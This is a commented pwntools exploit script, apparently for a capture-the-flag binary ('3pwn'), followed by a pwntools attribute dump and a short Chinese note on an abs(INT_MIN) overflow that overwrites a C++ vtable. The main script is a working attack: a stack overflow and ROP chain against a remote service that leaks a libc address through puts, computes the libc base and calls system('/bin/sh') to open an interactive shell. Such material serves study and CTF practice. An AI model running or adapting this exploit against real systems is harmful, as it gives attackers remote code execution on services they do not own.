#coding:utf-8
from pwn import *
from IPython import *
# Target selection. `debug` is hard-coded to True, so the first branch is the
# one that actually runs (host 10.141.10.236:10001 with verbose pwntools
# logging); flip it to False to use the second host/port without debug output.
debug = True
if debug:
    context(arch="x86_64",os = "linux",log_level="debug")
    p = remote("10.141.10.236",10001)
else:
    context(arch="x86_64",os = "linux")
    p = remote("10.141.10.43", 10000)
# Left disabled: attaching gdb by pid only makes sense when the target runs
# locally, not for the remote socket opened above.
#pwnlib.gdb.attach(proc.pidof(p)[0])
# Binary and the libc it is paired with. The ROP chain below uses `main_addr`
# and `puts_addr` as absolute addresses (and hard-codes a gadget address), so
# this only works against a non-PIE build of ./3pwn.
elf = ELF("./3pwn")
main_addr =elf.sym["main"]
# NOTE(review): for an imported function pwntools folds the PLT entry into
# `sym`, so this is presumably puts@plt — confirm with `elf.plt["puts"]`.
puts_addr = elf.sym["puts"]
# Offsets for puts/system/"/bin/sh" are read from this file, so it must be the
# exact libc build used by the remote service.
libc = ELF("libc.so")
def encrypt(idx):
    """Select menu option 1 ("encrypt") on the service and submit `idx` as the data.

    Waits for the menu prompt, answers "1", waits for the "encrypted" prompt
    and then sends `idx` terminated by a newline. Talks over the module-level
    tube `p`; returns nothing.
    """
    p.sendlineafter("choice!\n", "1")
    p.sendlineafter("encrypted\n", idx)
# Stage 1: leak a libc address. The gadget address comes from a ROPgadget dump
# of ./3pwn (stable only because the binary is non-PIE).
#0x0000000000400c83 : pop rdi ; ret
pop_rdi_ret = 0x400c83
# Stack layout (presumably): 0x50 bytes of buffer, 8 bytes where the saved rbp
# lives (0xdeadbeef is just filler), then the return address. The chain:
#   pop rdi; ret  -> rdi = address of puts@got
#   puts@plt      -> prints the GOT entry (the resolved libc puts address)
#   main          -> re-enters main so a second payload can be sent
# NOTE(review): the padding is NUL bytes rather than the usual "A"s — presumably
# dictated by how the program's encrypt routine treats the input; confirm.
# A stack canary, PIE or full RELRO on the target would each break this chain.
payload = "\x00"*0x50 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(elf.got["puts"]) + p64(puts_addr) +p64(main_addr)
encrypt(payload)
def get_addr():
    """Return the 64-bit address that the stage-1 chain made puts() print.

    Reads from the module-level tube `p` up to and including the first 0x7f
    byte (the usual top byte of a user-space libc mapping on x86-64), keeps the
    last six bytes of what was read, zero-pads them to eight and unpacks them
    little-endian.
    """
    received = p.recvuntil("\x7f")
    low_six = received[-6:]
    return u64(low_six.ljust(8, "\0"))
# Stage 2: turn the leaked puts address into the libc load base, then reuse the
# same overflow to call system("/bin/sh").
libc_puts = get_addr()                      # runtime address of puts in the remote libc
libc_base = libc_puts - libc.sym["puts"]    # leak minus the offset inside libc.so
success("libc_base -> {:#x}".format(libc_base))
libc_system = libc_base + libc.sym["system"]
# `.next()` on the search generator is Python 2 only; on Python 3 this would be
# `next(libc.search(b"/bin/sh"))`.
libc_binsh = libc_base + libc.search("/bin/sh").next()
success("libc_system -> {:#x}".format(libc_system))
success("libc_binsh -> {:#x}".format(libc_binsh))
# Same layout as stage 1: 0x50 padding, saved-rbp filler, then
# pop rdi; ret -> rdi = "/bin/sh", followed by the address of system.
payload = "\x00"*0x50 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(libc_binsh)+p64(libc_system)
encrypt(payload)
p.interactive()   # hand the tube over to the terminal
#embed()  # IPython breakpoint: drop into an interactive shell here while debugging
from pwn import *
# Separate exploration snippet: show where pwntools is imported from, start a
# local process tube and dump its attribute list. The bare string below is the
# captured output of that run (pid 70200), kept for reference.
# NOTE(review): `from pwn import *` does not necessarily bind the name `pwn`;
# if this line raises NameError, add an explicit `import pwn`.
print(pwn.__file__)
p = process("./2pwn")
print(dir(p))
'''
[+] Starting local process './2pwn': pid 70200
['PIPE', 'PTY', 'STDOUT', '__class__', '__delattr__', '__dict__', '__doc__', '__enter__', '__exit__', '__format__', '__getattr__', '__getattribute__',
'__hash__', '__init__', '__lshift__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rshift__', '__setattr__', '__sizeof__',
'__str__', '__subclasshook__', '__weakref__', '_corefile', '_cwd', '_fillbuffer', '_get_timeout_seconds', '_getlevel', '_handles', '_log', '_logger',
'_one_time_infos', '_one_time_warnings', '_process__on_enoexec', '_process__preexec_fn', '_process__pty_make_controlling_tty', '_qemu', '_recv', '_setuid',
'_stop', '_stop_noticed', '_timeout', '_validate', 'addHandler', 'alarm', 'argv', 'aslr', 'buffer', 'can_recv', 'can_recv_raw', 'clean', 'clean_and_log',
'close', 'communicate', 'connect_both', 'connect_input', 'connect_output', 'connected', 'connected_directions', 'connected_raw', 'corefile', 'countdown',
'countdown_active', 'critical', 'cwd', 'debug', 'default', 'display', 'elf', 'env', 'error', 'exception', 'executable', 'failure', 'fileno', 'fit', 'flat',
'forever', 'gid', 'hexdump', 'indented', 'info', 'info_once', 'interactive', 'isEnabledFor', 'kill', 'leak', 'level', 'libc', 'libs', 'local', 'log',
'maximum', 'newline', 'p16', 'p32', 'p64', 'p8', 'pack', 'poll', 'preexec_fn', 'proc', 'program', 'progress', 'pty', 'raw', 'read', 'readall', 'readline',
'readline_contains', 'readline_endswith', 'readline_pred', 'readline_regex', 'readline_startswith', 'readlines', 'readn', 'readpred', 'readregex',
'readrepeat', 'readuntil', 'recv', 'recv_raw', 'recvall', 'recvline', 'recvline_contains', 'recvline_endswith', 'recvline_pred', 'recvline_regex',
'recvline_startswith', 'recvlines', 'recvn', 'recvpred', 'recvregex', 'recvrepeat', 'recvuntil', 'removeHandler', 'send', 'send_raw', 'sendafter',
'sendline', 'sendlineafter', 'sendlines', 'sendlinethen', 'sendthen', 'setLevel', 'settimeout', 'settimeout_raw', 'sgid', 'shutdown', 'shutdown_directions',
'shutdown_raw', 'spawn_process', 'stderr', 'stdin', 'stdout', 'stream', 'success', 'suid', 'timeout', 'timeout_change', 'u16', 'u32', 'u64', 'u8',
'uid', 'unpack', 'unrecv', 'wait', 'wait_for_close', 'waitfor', 'warn', 'warn_once', 'warning', 'warning_once', 'write', 'writeafter', 'writeline',
'writelineafter', 'writelinethen', 'writethen']
[*] Stopped process './2pwn' (pid 70200)
'''
溢出点
在 update 函数中有一个典型的 abs 漏洞：输入 0x80000000（即 INT_MIN）时，abs() 发生有符号整数溢出、结果仍为负数，于是可以直接修改 C++ 对象的虚表。